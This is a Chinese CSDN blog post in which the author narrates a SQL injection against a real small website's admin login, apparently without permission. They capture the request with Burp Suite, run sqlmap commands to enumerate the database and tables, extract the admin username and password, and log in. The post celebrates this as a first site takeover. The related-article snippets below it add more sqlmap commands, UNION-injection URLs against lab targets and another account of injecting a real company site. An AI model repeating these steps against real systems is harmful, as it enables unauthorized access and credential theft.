记一次sql注入实战

最新推荐文章于 2024-07-22 22:02:34 发布
最新推荐文章于 2024-07-22 22:02:34 发布
阅读量590 收藏 12
点赞数 5
分类专栏: Web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43710889/article/details/118661578
版权

文章目录


记录一下第一次拿站
偶然的时间,偶然的网址我看到了偶然的一次sql注入,苦苦寻找的小网站在那一瞬间被找到,一个字爽。
首次看到这个后台管理页面,没有验证码,所以尝试sql注入。简单试了试,决定查看是否存在POST注入。
在这里插入图片描述

首先使用代理Brupsuite进行抓包,抓取请求包。

在这里插入图片描述
将请求包中的内容,粘贴到文本中。

之后使用sqlmap进行注入

python sqlmap.py -r "test.txt"

在这里插入图片描述

然后查看当前所在的数据库,查看当前用户

python sqlmap.py -r "test.txt" --current-user --current-db

在这里插入图片描述

找到当前数据库后,查看数据库中存在的表项

python sqlmap.py -r "test.txt" --tables -D "expmpleDatabase"

在这里插入图片描述

。。。很多操作后

找到用户名密码

在这里插入图片描述

尝试登入

在这里插入图片描述

登入成功

最后在查看数据库的过程中发现五六月份,也是有好几个白帽子告诉站主存在sql漏洞。恰巧遇到这么一个简单注入的网站,记录一下

南岸青栀*
关注
专栏目录
一次api接口SQL注入实战
m0_65247093的博客
04-30 3340
目录 0x01 思路:google hacking语法asmx?wsdl 0x02 发现两个接口 并且能够异地调用 0x03 抓包repeat判断 0x04 暴库 指导 某迪导师 0x01 思路:google hacking语法asmx?wsdl 点击url:domain/WebServices/InboxWS.asmx 0x02 发现两个接口 并且能够异地调用 火狐中抓包 测试 0x03 抓包repeat判断 四个参数加 ' 报nynax错误 由此推断可能存..
一次我的漏洞挖掘实战——某公司的SQL注入漏洞
PICACHU+++的博客
05-02 5025
我是在漏洞盒子上提交的漏洞,上面有一个项目叫做公益SRC。公益src是一个白帽子提交随机发现的漏洞的品台,我们可以把我们随机发现或者是主动寻找到的漏洞在漏洞盒子进行提交。在挖掘src的时候不能越红线,一般情况下遇到SQL注入 只获取数据库名字以证明漏洞的存在即可,最好不要再往下获取。而xss漏洞 ,只获取自己的cookie或ip等信息以证明漏洞存在。遇到信息泄露时,如果存在可以下载敏感文件的情况那么在漏洞确认后一定要将文件删除。SQL注入的防御方法很多,也是老生常谈的问题。
一次sql注入实践
程序男的专栏
03-01 535
今天开发代码的时候发现自己的sql全是拼接的,不是where a = ?的那种,细思恐极啊,于是进行了一场sql注入实践。虽然失败了,但是还是得出了一些宝贵的经验。 首先从一个基础的分页查询语句开始分析: Select r.a,r.b  from role r where r.name like ‘role%’  order by r.create_time desc liimit 0,10;说明...
一文带你快速回忆SQL注入
最新发布
carrot11223的博客
07-22 659
SQL 注入是一种常见的网络攻击手段,攻击者通过在用户输入中插入恶意的 SQL 代码,从而控制或破坏目标数据库。通常,这种漏洞存在于应用程序对用户输入未进行充分过滤和处理的情况下。
SQL注入一次实操
qq_40481505的博客
07-21 465
1.sql注入点类型判断   对于一个sql注入点,存在两种不同的类型整型和字符串型,不同类型的sql语句存在差异 列如,假设有变量$id,当其为字符串型时,sql语句为: SELECT * FROM user WHERE id = '$id'; 而当$id为整型时,语句为: SELECT * FROM user WHERE id = $id; 这导致注入的内容会存在差异,因此在注入前需要确定...
SQL注入实战
qq_44915227的博客
04-17 1853
所谓的SQL注入,就是通过把恶意的sql命令插入web表单递交给服务器,或者输入域名或页面请求的查询字符串递交到服务器,达到欺骗服务器,让服务器执行这些恶意的sql命令,从而让攻击者,可以绕过一些机制,达到直接访问数据库的一种攻击手段,而不是按照设计者意图去执行SQL语句。
SQL注入实战(一)
木尤的博客
07-10 1087
封神台靶场 https://hack.zkaq.cn/battle/target?id=485e58d0afa7e4f7 查找注入点: sqlmap.py -u http://59.63.200.79:8003/?id=1 查找数据库 sqlmap.py -u http://59.63.200.79:8003/?id=1 --dbs 有三个数据库 available databases [3]: [] information_schema [] maoshe [*] test 初步判断是maoshe 查找m
sql注入教程.sql注入实战
11-09
sql注入详细教程 寻找存在sql注入的网址 探测过滤 tamper 得到shell
sql注入实战(一)
whiteso的博客
01-19 746
实例靶场 http://59.63.200.79:8003/ http://59.63.200.79:8003/?id=1 and 1=1 order by 3 http://59.63.200.79:8003/?id=1 and 1=2 union select 1,database() http://59.63.200.79:8003/?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_sc
SQL注入实战
hxhabcd123的博客
08-28 2514
本文录各种SQL注入类型的实操过程
一次实战SQL注入
weixin_46206086的博客
09-30 152
SQL注入 菜鸡实战
一次艰难的SQL注入(过安全狗)
白帽子凯哥聊黑客
05-29 1415
实战注入的难度比靶场大得多,各种绕过,各种骚操作。要学会利用搜索工具,更要学会选择性放弃。当一条路走不通就换另一种方法,也许就会柳暗花明又一村。网络安全学习资源分享:给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。因篇幅有限,仅展示部分资料,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,需要点击下方链接即可前往获取。
SQL注入实战演练
derman的博客
10-16 252
1.如何判断此处是否有SQL注入漏洞? 方法一:输入-1或+1,看是否能够回显上一个或者下一个页面(判断是否有回显)。 方法二:'或" ,看是否显示数据库错误信息,并根据回显内容可以判断是字符型数据还是数字型。 方法三:and 1=1 或and 1=2 ,看回显的页面是否不同(布尔类型的状态)。 方法四:and sleep(5) ,判断页面的返回时间。 方法五:\ ,判断转义 2.实例 2.1 联合查询 2.1 报错注入 2.3 布尔盲注 2.4 延时注入 2.5 堆...
一次对真实网站的SQL注入实战
qq_43678263的博客
03-31 5505
一次对真实网站的SQL注入实战前言发现过程漏洞利用总结 前言 某集团股份有限公司网站存在SQL注入漏洞 发现过程 用针对性工具扫描(这里使用的是超级SQL注入工具)问题网站,得到以下链接均存在SQL注入漏洞 问题URL: fuwu_fanwei.php?fid=1 fuwu_zhichi.php?zid=5 video.php?video_id=1 news.php?nid=1 about.php?aid=1 fuwu_fanwei_content.php?fid=1&id=1 漏洞利用 这里使
SQL注入实战---利用“dbo”获得SQL管理权限和系统权限
Akuma专栏
04-07 948
刚刚开始学习SQL注入入侵,有写的不对和不好的地方希望各位师哥,师姐们多多指导。在一个供求信息发布的网站上测试了一下,页面Http://www.xxx.com/new/new.asp?id=49我做了如下测试:(1) Http://www.xxx.com/new/new.asp?id=49Microsoft OLE DB Provider for ODBC Drivers 错误 8
一次SQL注入
qq_43933657的博客
07-08 503
寻找注入点 -u : 指定目标URL,sql注入点 python sqlmap.py -u http://43.247.91.228:81/login.php 输出: ___ __H__ ___ ___[.]_____ ___ ___ {1.4.7.2#dev} |_ -| . ["] | .'| . | |___|_ ["]_|_|_|__,| _| |_|V... |_| http://sqlmap.org [!] legal
一次sql注入
qq_44248518的博客
03-05 107
一次sql注入
ASP.NET HttpModule防止SQL注入实战
SQL注入是一种常见的网络安全漏洞,攻击者通过在输入字段中插入恶意SQL语句,试图获取、修改、删除数据库中的敏感信息。为了防止这种情况,开发者需要对用户输入进行验证和清理,确保它们不会对数据库执行未经许可的...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

南岸青栀*

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值